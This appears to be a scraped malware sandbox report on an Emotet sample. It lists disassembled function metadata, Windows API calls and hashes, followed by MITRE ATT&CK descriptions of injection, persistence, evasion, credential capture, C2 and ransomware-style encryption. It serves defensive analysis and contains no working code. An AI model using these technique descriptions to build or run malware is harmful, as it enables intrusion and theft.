Part of subcall function 00442109: GetStockObject.GDI32(00000000), ref: 0044211F
Part of subcall function 00442109: InflateRect.USER32(?,000000FF,000000FF), ref: 004421C3

ReleaseCapture.USER32 ref: 004420CB
GetDesktopWindow.USER32 ref: 004420D1
LockWindowUpdate.USER32(00000000,00000000,?,004424BF,00000000), ref: 004420E1
ReleaseDC.USER32(?,?), ref: 004420FD

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
String ID:
API String ID: 1260764132-0
Opcode ID: 3844e7c5000c5c50ca49394ba436dec886eab3f35d4b83429ccdd9345ea70c65
Instruction ID: 7b0d05184a800ac82c0096e63e09174609394c3a742442a7a440b5a884415b58
Opcode Fuzzy Hash: 3844e7c5000c5c50ca49394ba436dec886eab3f35d4b83429ccdd9345ea70c65
Instruction Fuzzy Hash: EFE09A32500710ABE7102B71FD1DB6A7AA4BF40312F19443AF609861A3DAB4C800CB98

Function 008E2430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 008E2468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 008E24B2

Strings

@, xrefs: 008E2453

Memory Dump Source

Source File: 00000002.00000002.2728197966.00000000008E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 008E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8e1000_provthrd.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 9275ebe1b7be7c26ed3bbeb70aef0e28dca6429408fcb93b5f423882eb8c945a
Instruction ID: 37031fa16643644e157696a8774e901566916d71fc3c31ea5784c1af590f7703
Opcode Fuzzy Hash: 9275ebe1b7be7c26ed3bbeb70aef0e28dca6429408fcb93b5f423882eb8c945a
Instruction Fuzzy Hash: A321DAB090014DEFDB14CF95C984BADBBB9FF45308F248199D905AB281C774AF80DB55

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ExeFile (360).exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Emotet

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Windows Analysis Report
ExeFile (360).exe

Function 004036D0 Relevance: 39.2, APIs: 6, Strings: 16, Instructions: 664
memorywindowCOMMON

Function 02501030 Relevance: 18.4, APIs: 12, Instructions: 362
libraryloaderCOMMON

Function 00697D60 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 219
fileCOMMON

Function 006938B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189
fileCOMMON

Function 006980D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169
fileCOMMON

Function 0044B3CB Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Function 00694F50 Relevance: 3.2, APIs: 2, Instructions: 249
memoryCOMMON

Function 0044ADBB Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Function 0043428A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27
threadCOMMON

Function 00695C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Function 0041ED68 Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Function 0054002D Relevance: 4.9, APIs: 3, Instructions: 387
memoryCOMMON

Function 004063C0 Relevance: 4.6, APIs: 3, Instructions: 138
threadCOMMON

Function 00699530 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 201
COMMON

Function 00694A80 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87
processCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre